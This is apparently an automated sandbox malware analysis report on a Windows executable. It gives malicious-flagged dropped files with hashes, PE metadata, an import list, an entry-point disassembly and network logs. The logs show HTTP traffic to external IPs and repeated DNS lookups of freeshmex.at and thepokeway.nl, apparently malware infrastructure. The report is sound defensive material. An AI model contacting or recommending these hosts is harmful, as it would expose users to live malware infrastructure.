              SHA-512:F29B4F4B64394B127F939466AF5D189408C6D296E94469000E72690129753FB0C1232B925C2C50FC252E273E503DEC984EE95BECD267F897B5E57493DD7F6412
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.................................4................=................Rich...........................PE..L....3Cb.....................D(......o............@...........................)......C......................................\...d.....).............................p...............................P<..@............... ............................text............................... ..`.data...(.'.........................@....rsrc.........)..0..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\B87E.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):785408
              Entropy (8bit):6.878292814763175
              Encrypted:false
              SSDEEP:12288:8jrCotmFXRwupVoGK25MAaSOWfvjCqanOxku3lle2kKE:AzmFB3oG1aSbvGqanwRro
              MD5:D8CA174A8F3F0C225429E1BE1CB6D304
              SHA1:0F2E738B1A35B6072E1D23894468E45FA7DEE750
              SHA-256:3D63AD175A34E4C89EA6ECA4A1161BB5DD514A5E58302707EDC03473EB1F656E
              SHA-512:DBF999A9F0399B3CBF93484F2E665E3BEB4DE369DACF4678C7B7B3FF06F45C42879C544C2404D85B88FE3AAACF117A1E28ECB68EE7EA2553B736BAD03619E527
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 24%
              • Antivirus: Virustotal, Detection: 35%, Browse
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e:..![.@![.@![.@.,.A&[.@.,.A [.@L..A"[.@![.@5[.@.D.@([.@...A [.@...A [.@...A [.@Rich![.@................PE..L...v..c...........!.....f..........J........................................ ............@.............................@.......<................................]......................................................@............................text....d.......f.................. ..`.rdata...............j..............@..@.data..../.......0...n..............@....reloc...].......^..................@..B........................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\explorer.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):192000
              Entropy (8bit):6.98989950872948
              Encrypted:false
              SSDEEP:3072:hsKq2z/YFBDK+1L8pOov9vl5izTyHnbACodEdE53iiy2:tqG6LaO6QTak/dKEFii1
              MD5:44C87D3BC316EEFE4DCBF66AFED72ABC
              SHA1:96BDE412EF761B4D53506AE4ED2999BC9DCAF137
              SHA-256:731E22BE2A6B39304919DC24B750A720B23A0F1ED996A9B74CF0B088DE6144B1
              SHA-512:2449DA42CF169EF2A9E01ADE64DD8C52AB6037CE9A726597D88F5EEAA726B06F77BC08612AAECCF9354CD23BEE879B1724F222E24C8BAB25FEF7E75A8BF0E0C1
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.................................4................=................Rich...........................PE..L......`.....................>#......o............@...........................$............................................\...d.....$.............................p...............................P<..@............... ............................text............................... ..`.data.....".........................@....rsrc.........$..0..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\explorer.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:high, very likely benign file
              Preview:[ZoneTransfer]....ZoneId=0
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.98989950872948
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.53%
              • InstallShield setup (43055/19) 0.43%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:file.exe
              File size:192000
              MD5:44c87d3bc316eefe4dcbf66afed72abc
              SHA1:96bde412ef761b4d53506ae4ed2999bc9dcaf137
              SHA256:731e22be2a6b39304919dc24b750a720b23a0f1ed996a9b74cf0b088de6144b1
              SHA512:2449da42cf169ef2a9e01ade64dd8c52ab6037ce9a726597d88f5eeaa726b06f77bc08612aaeccf9354cd23bee879b1724f222e24c8bab25fef7e75a8bf0e0c1
              SSDEEP:3072:hsKq2z/YFBDK+1L8pOov9vl5izTyHnbACodEdE53iiy2:tqG6LaO6QTak/dKEFii1
              TLSH:CC14BF353680D072C59E65708C60EAA1AB7DAA3155B885377BA80B7E5F703D0AF3634F
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.......................................4...................=...................Rich............................PE..L......`...
              Icon Hash:c8d0d8e0f8e0f0e0
              Entrypoint:0x406fe6
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x60DF08C1 [Fri Jul 2 12:38:25 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:5a0f5eee1a1d8df02fd40c6cf3174a3d
              Instruction
              call 00007F9BE0977256h
              jmp 00007F9BE096F8DEh
              mov ecx, dword ptr [esp+04h]
              test ecx, 00000003h
              je 00007F9BE096FA86h
              mov al, byte ptr [ecx]
              add ecx, 01h
              test al, al
              je 00007F9BE096FAB0h
              test ecx, 00000003h
              jne 00007F9BE096FA51h
              add eax, 00000000h
              lea esp, dword ptr [esp+00000000h]
              lea esp, dword ptr [esp+00000000h]
              mov eax, dword ptr [ecx]
              mov edx, 7EFEFEFFh
              add edx, eax
              xor eax, FFFFFFFFh
              xor eax, edx
              add ecx, 04h
              test eax, 81010100h
              je 00007F9BE096FA4Ah
              mov eax, dword ptr [ecx-04h]
              test al, al
              je 00007F9BE096FA94h
              test ah, ah
              je 00007F9BE096FA86h
              test eax, 00FF0000h
              je 00007F9BE096FA75h
              test eax, FF000000h
              je 00007F9BE096FA64h
              jmp 00007F9BE096FA2Fh
              lea eax, dword ptr [ecx-01h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-02h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-03h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-04h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              cmp ecx, dword ptr [0042B970h]
              jne 00007F9BE096FA64h
              rep ret
              jmp 00007F9BE097724Dh
              push eax
              push dword ptr fs:[00000000h]
              lea eax, dword ptr [esp+0Ch]
              sub esp, dword ptr [esp+0Ch]
              push ebx
              push esi
              push edi
              mov dword ptr [eax], ebp
              mov ebp, eax
              mov eax, dword ptr [0042B970h]
              xor eax, ebp
              push eax
              push dword ptr [ebp-04h]
              mov dword ptr [ebp+00h], 00000000h
              Programming Language:
              • [ASM] VS2008 build 21022
              • [ C ] VS2008 build 21022
              • [IMP] VS2005 build 50727
              • [C++] VS2008 build 21022
              • [RES] VS2008 build 21022
              • [LNK] VS2008 build 21022
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x1a05c0x64.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2490000x2ee8.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x12700x1c.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3c500x40.text
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x220.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x19cf40x19e00False0.5226637983091788data6.3440620232767975IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0x1b0000x22dac80x11c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x2490000x2ee80x3000False0.639892578125data5.694966696037735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              RT_ICON0x2491f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
              RT_ICON0x2498b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
              RT_ICON0x249e200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
              RT_ICON0x24aec80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Raeto-RomanceSwitzerland
              RT_ICON0x24b8500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
              RT_ACCELERATOR0x24bd080x98dataRaeto-RomanceSwitzerland
              RT_GROUP_ICON0x24bcb80x4cdataRaeto-RomanceSwitzerland
              RT_VERSION0x24bda00x148x86 executable not stripped
              DLLImport
              KERNEL32.dllWriteConsoleInputA, EnumDateFormatsA, OpenMutexA, GetConsoleAliasExesLengthW, CopyFileExA, ReadConsoleOutputCharacterA, GetEnvironmentStrings, FreeUserPhysicalPages, QueryDosDeviceA, EnumCalendarInfoExA, GetProcessPriorityBoost, LocalSize, AddConsoleAliasW, CreateFileW, GetMailslotInfo, GetWindowsDirectoryA, GetModuleHandleW, VirtualFree, CreateDirectoryExA, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerW, GetVersionExA, SearchPathA, RequestWakeupLatency, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotW, BuildCommDCBAndTimeoutsA, GetProcAddress, GetModuleHandleA, LocalAlloc, FindNextFileA, TerminateThread, GetCommandLineW, FindFirstChangeNotificationA, VerifyVersionInfoA, DeleteTimerQueue, FindFirstVolumeA, GlobalFlags, GetTickCount, GetACP, GlobalWire, GetTapeParameters, HeapWalk, GetConsoleTitleA, InterlockedCompareExchange, EnumCalendarInfoA, GetNamedPipeHandleStateW, InterlockedDecrement, SetCalendarInfoA, TerminateProcess, MoveFileA, AddAtomW, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointA, VirtualAlloc, SetConsoleActiveScreenBuffer, GetCPInfo, GetProcessIoCounters, GlobalFindAtomA, CreateFileA, CloseHandle, GetVolumeInformationA, EnumSystemCodePagesA, MoveFileWithProgressA, LoadLibraryW, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, RtlUnwind, GetLastError, DeleteFileA, GetStartupInfoW, HeapAlloc, HeapFree, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameW, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, GetOEMCP, IsValidCodePage, HeapSize, LoadLibraryA, InitializeCriticalSectionAndSpinCount, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, ReadFile
              USER32.dllGetComboBoxInfo, GetMessageExtraInfo, GetListBoxInfo
              GDI32.dllGetBoundsRect
              ADVAPI32.dllSetThreadToken
              Language of compilation systemCountry where language is spokenMap
              Raeto-RomanceSwitzerland
              TimestampSource PortDest PortSource IPDest IP
              Nov 24, 2022 20:13:00.179537058 CET4969680192.168.2.4190.140.74.43
              Nov 24, 2022 20:13:00.369390011 CET8049696190.140.74.43192.168.2.4
              Nov 24, 2022 20:13:00.369549036 CET4969680192.168.2.4190.140.74.43
              Nov 24, 2022 20:13:00.375032902 CET4969680192.168.2.4190.140.74.43
              Nov 24, 2022 20:13:00.375082016 CET4969680192.168.2.4190.140.74.43
              Nov 24, 2022 20:13:00.565493107 CET8049696190.140.74.43192.168.2.4
              Nov 24, 2022 20:13:01.250077009 CET8049696190.140.74.43192.168.2.4
              Nov 24, 2022 20:13:01.250516891 CET4969680192.168.2.4190.140.74.43
              Nov 24, 2022 20:13:01.253446102 CET8049696190.140.74.43192.168.2.4
              Nov 24, 2022 20:13:01.256314039 CET4969680192.168.2.4190.140.74.43
              Nov 24, 2022 20:13:01.441453934 CET8049696190.140.74.43192.168.2.4
              Nov 24, 2022 20:13:01.503216028 CET4969780192.168.2.4211.53.230.67
              Nov 24, 2022 20:13:01.762573957 CET8049697211.53.230.67192.168.2.4
              Nov 24, 2022 20:13:01.762818098 CET4969780192.168.2.4211.53.230.67
              Nov 24, 2022 20:13:01.762887001 CET4969780192.168.2.4211.53.230.67
              Nov 24, 2022 20:13:01.765835047 CET4969780192.168.2.4211.53.230.67
              Nov 24, 2022 20:13:02.025166035 CET8049697211.53.230.67192.168.2.4
              Nov 24, 2022 20:13:03.711689949 CET8049697211.53.230.67192.168.2.4
              Nov 24, 2022 20:13:03.711747885 CET8049697211.53.230.67192.168.2.4
              Nov 24, 2022 20:13:03.711883068 CET4969780192.168.2.4211.53.230.67
              Nov 24, 2022 20:13:03.711942911 CET4969780192.168.2.4211.53.230.67
              Nov 24, 2022 20:13:03.971602917 CET8049697211.53.230.67192.168.2.4
              Nov 24, 2022 20:13:04.214900970 CET4969880192.168.2.4211.40.39.251
              Nov 24, 2022 20:13:04.464004040 CET8049698211.40.39.251192.168.2.4
              Nov 24, 2022 20:13:04.464221954 CET4969880192.168.2.4211.40.39.251
              Nov 24, 2022 20:13:04.464222908 CET4969880192.168.2.4211.40.39.251
              Nov 24, 2022 20:13:04.464287996 CET4969880192.168.2.4211.40.39.251
              Nov 24, 2022 20:13:04.713635921 CET8049698211.40.39.251192.168.2.4
              Nov 24, 2022 20:13:05.402805090 CET8049698211.40.39.251192.168.2.4
              Nov 24, 2022 20:13:05.402868032 CET8049698211.40.39.251192.168.2.4
              Nov 24, 2022 20:13:05.402985096 CET4969880192.168.2.4211.40.39.251
              Nov 24, 2022 20:13:05.403079033 CET4969880192.168.2.4211.40.39.251
              Nov 24, 2022 20:13:05.652757883 CET8049698211.40.39.251192.168.2.4
              Nov 24, 2022 20:13:05.674043894 CET4969980192.168.2.4211.171.233.129
              Nov 24, 2022 20:13:05.928874016 CET8049699211.171.233.129192.168.2.4
              Nov 24, 2022 20:13:05.929179907 CET4969980192.168.2.4211.171.233.129
              Nov 24, 2022 20:13:05.929245949 CET4969980192.168.2.4211.171.233.129
              Nov 24, 2022 20:13:05.929267883 CET4969980192.168.2.4211.171.233.129
              Nov 24, 2022 20:13:06.184005976 CET8049699211.171.233.129192.168.2.4
              Nov 24, 2022 20:13:07.234910011 CET8049699211.171.233.129192.168.2.4
              Nov 24, 2022 20:13:07.234982967 CET8049699211.171.233.129192.168.2.4
              Nov 24, 2022 20:13:07.235172033 CET4969980192.168.2.4211.171.233.129
              Nov 24, 2022 20:13:07.238368034 CET4969980192.168.2.4211.171.233.129
              Nov 24, 2022 20:13:07.493017912 CET8049699211.171.233.129192.168.2.4
              Nov 24, 2022 20:13:07.713021994 CET4970080192.168.2.4109.102.255.230
              Nov 24, 2022 20:13:07.766684055 CET8049700109.102.255.230192.168.2.4
              Nov 24, 2022 20:13:07.766917944 CET4970080192.168.2.4109.102.255.230
              Nov 24, 2022 20:13:07.766982079 CET4970080192.168.2.4109.102.255.230
              Nov 24, 2022 20:13:07.767508030 CET4970080192.168.2.4109.102.255.230
              Nov 24, 2022 20:13:07.824245930 CET8049700109.102.255.230192.168.2.4
              Nov 24, 2022 20:13:08.069124937 CET8049700109.102.255.230192.168.2.4
              Nov 24, 2022 20:13:08.069317102 CET4970080192.168.2.4109.102.255.230
              Nov 24, 2022 20:13:08.075387001 CET8049700109.102.255.230192.168.2.4
              Nov 24, 2022 20:13:08.075546980 CET4970080192.168.2.4109.102.255.230
              Nov 24, 2022 20:13:08.078490973 CET4970080192.168.2.4109.102.255.230
              Nov 24, 2022 20:13:08.082349062 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.130449057 CET8049700109.102.255.230192.168.2.4
              Nov 24, 2022 20:13:08.363208055 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.363341093 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.363487005 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.644393921 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.644607067 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.644655943 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.644696951 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.644737959 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.644778013 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.644783020 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.644825935 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.644841909 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.644870996 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.644891024 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.644956112 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.645013094 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.645055056 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.645167112 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.925841093 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.925894022 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.925937891 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.925980091 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926021099 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926053047 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926084995 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926117897 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926120996 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.926187992 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926225901 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.926230907 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926270008 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926280022 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.926311016 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926354885 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926363945 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.926395893 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926436901 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926445961 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.926482916 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926523924 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926532984 CET4970180192.168.2.4123.253.32.170
              Nov 24, 2022 20:13:08.926564932 CET8049701123.253.32.170192.168.2.4
              Nov 24, 2022 20:13:08.926605940 CET8049701123.253.32.170192.168.2.4
              TimestampSource PortDest PortSource IPDest IP
              Nov 24, 2022 20:12:59.935297966 CET5657253192.168.2.48.8.8.8
              Nov 24, 2022 20:13:00.175766945 CET53565728.8.8.8192.168.2.4
              Nov 24, 2022 20:13:01.266431093 CET5091153192.168.2.48.8.8.8
              Nov 24, 2022 20:13:01.502526999 CET53509118.8.8.8192.168.2.4
              Nov 24, 2022 20:13:03.722253084 CET5968353192.168.2.48.8.8.8
              Nov 24, 2022 20:13:04.211875916 CET53596838.8.8.8192.168.2.4
              Nov 24, 2022 20:13:05.434669971 CET6416753192.168.2.48.8.8.8
              Nov 24, 2022 20:13:05.672918081 CET53641678.8.8.8192.168.2.4
              Nov 24, 2022 20:13:07.250185966 CET5856553192.168.2.48.8.8.8
              Nov 24, 2022 20:13:07.711612940 CET53585658.8.8.8192.168.2.4
              Nov 24, 2022 20:13:14.580648899 CET5223953192.168.2.48.8.8.8
              Nov 24, 2022 20:13:14.598026037 CET53522398.8.8.8192.168.2.4
              Nov 24, 2022 20:13:14.810918093 CET5680753192.168.2.48.8.8.8
              Nov 24, 2022 20:13:14.828412056 CET53568078.8.8.8192.168.2.4
              Nov 24, 2022 20:13:15.572982073 CET6100753192.168.2.48.8.8.8
              Nov 24, 2022 20:13:15.592614889 CET53610078.8.8.8192.168.2.4
              Nov 24, 2022 20:13:15.929008007 CET6068653192.168.2.48.8.8.8
              Nov 24, 2022 20:13:16.396440029 CET53606868.8.8.8192.168.2.4
              Nov 24, 2022 20:13:18.701905966 CET6112453192.168.2.48.8.8.8
              Nov 24, 2022 20:13:18.721328974 CET53611248.8.8.8192.168.2.4
              Nov 24, 2022 20:13:20.234677076 CET5944453192.168.2.48.8.8.8
              Nov 24, 2022 20:13:20.254560947 CET53594448.8.8.8192.168.2.4
              Nov 24, 2022 20:13:21.596772909 CET5557053192.168.2.48.8.8.8
              Nov 24, 2022 20:13:21.614191055 CET53555708.8.8.8192.168.2.4
              Nov 24, 2022 20:13:21.912702084 CET6490653192.168.2.48.8.8.8
              Nov 24, 2022 20:13:21.932231903 CET53649068.8.8.8192.168.2.4
              Nov 24, 2022 20:13:22.244184971 CET5944653192.168.2.48.8.8.8
              Nov 24, 2022 20:13:22.264146090 CET53594468.8.8.8192.168.2.4
              Nov 24, 2022 20:13:23.836488008 CET6108853192.168.2.48.8.8.8
              Nov 24, 2022 20:13:23.853676081 CET53610888.8.8.8192.168.2.4
              Nov 24, 2022 20:13:25.197235107 CET5872953192.168.2.48.8.8.8
              Nov 24, 2022 20:13:25.443180084 CET53587298.8.8.8192.168.2.4
              Nov 24, 2022 20:13:25.826148987 CET6470053192.168.2.48.8.8.8
              Nov 24, 2022 20:13:25.852006912 CET53647008.8.8.8192.168.2.4
              Nov 24, 2022 20:13:26.118453026 CET5602253192.168.2.48.8.8.8
              Nov 24, 2022 20:13:26.163016081 CET53560228.8.8.8192.168.2.4
              Nov 24, 2022 20:13:27.561788082 CET6082253192.168.2.48.8.8.8
              Nov 24, 2022 20:13:27.585237026 CET53608228.8.8.8192.168.2.4
              Nov 24, 2022 20:13:27.940895081 CET4975053192.168.2.48.8.8.8
              Nov 24, 2022 20:13:27.964770079 CET53497508.8.8.8192.168.2.4
              Nov 24, 2022 20:13:29.193562984 CET6055053192.168.2.48.8.8.8
              Nov 24, 2022 20:13:29.219906092 CET53605508.8.8.8192.168.2.4
              Nov 24, 2022 20:13:29.630523920 CET5485153192.168.2.48.8.8.8
              Nov 24, 2022 20:13:29.651410103 CET53548518.8.8.8192.168.2.4
              Nov 24, 2022 20:13:30.759373903 CET5730053192.168.2.48.8.8.8
              Nov 24, 2022 20:13:30.784167051 CET53573008.8.8.8192.168.2.4
              Nov 24, 2022 20:13:32.005364895 CET5452153192.168.2.48.8.8.8
              Nov 24, 2022 20:13:32.024302959 CET53545218.8.8.8192.168.2.4
              Nov 24, 2022 20:13:33.404093981 CET5891453192.168.2.48.8.8.8
              Nov 24, 2022 20:13:33.421724081 CET53589148.8.8.8192.168.2.4
              Nov 24, 2022 20:13:33.718513012 CET5141953192.168.2.48.8.8.8
              Nov 24, 2022 20:13:33.736593008 CET53514198.8.8.8192.168.2.4
              Nov 24, 2022 20:13:34.239005089 CET5105453192.168.2.48.8.8.8
              Nov 24, 2022 20:13:34.258749962 CET53510548.8.8.8192.168.2.4
              Nov 24, 2022 20:13:34.651309013 CET5567353192.168.2.48.8.8.8
              Nov 24, 2022 20:13:34.668950081 CET53556738.8.8.8192.168.2.4
              Nov 24, 2022 20:13:35.423708916 CET4973553192.168.2.48.8.8.8
              Nov 24, 2022 20:13:35.443448067 CET53497358.8.8.8192.168.2.4
              Nov 24, 2022 20:13:37.516464949 CET5243753192.168.2.48.8.8.8
              Nov 24, 2022 20:13:37.534168005 CET53524378.8.8.8192.168.2.4
              Nov 24, 2022 20:13:38.002130032 CET5282553192.168.2.48.8.8.8
              Nov 24, 2022 20:13:38.022118092 CET53528258.8.8.8192.168.2.4
              Nov 24, 2022 20:13:39.548868895 CET5853053192.168.2.48.8.8.8
              Nov 24, 2022 20:13:39.568480968 CET53585308.8.8.8192.168.2.4
              Nov 24, 2022 20:13:39.808876991 CET6495953192.168.2.48.8.8.8
              Nov 24, 2022 20:13:39.828243017 CET53649598.8.8.8192.168.2.4
              Nov 24, 2022 20:13:40.208877087 CET6309353192.168.2.48.8.8.8
              Nov 24, 2022 20:13:40.226567030 CET53630938.8.8.8192.168.2.4
              Nov 24, 2022 20:13:41.303160906 CET5043353192.168.2.48.8.8.8
              Nov 24, 2022 20:13:41.322443962 CET53504338.8.8.8192.168.2.4
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Nov 24, 2022 20:12:59.935297966 CET192.168.2.48.8.8.80x5b1bStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.266431093 CET192.168.2.48.8.8.80xa72eStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:03.722253084 CET192.168.2.48.8.8.80x268bStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.434669971 CET192.168.2.48.8.8.80xe8d2Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.250185966 CET192.168.2.48.8.8.80x2615Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.580648899 CET192.168.2.48.8.8.80x4259Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.810918093 CET192.168.2.48.8.8.80x451cStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.572982073 CET192.168.2.48.8.8.80x6a0cStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.929008007 CET192.168.2.48.8.8.80x90b5Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.701905966 CET192.168.2.48.8.8.80x5229Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.234677076 CET192.168.2.48.8.8.80x534eStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.596772909 CET192.168.2.48.8.8.80x9b24Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.912702084 CET192.168.2.48.8.8.80x1f86Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.244184971 CET192.168.2.48.8.8.80xb6d9Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.836488008 CET192.168.2.48.8.8.80xd330Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.197235107 CET192.168.2.48.8.8.80xd930Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.826148987 CET192.168.2.48.8.8.80x5c52Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:26.118453026 CET192.168.2.48.8.8.80x2242Standard query (0)thepokeway.nlA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.561788082 CET192.168.2.48.8.8.80x9072Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.940895081 CET192.168.2.48.8.8.80x2c30Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
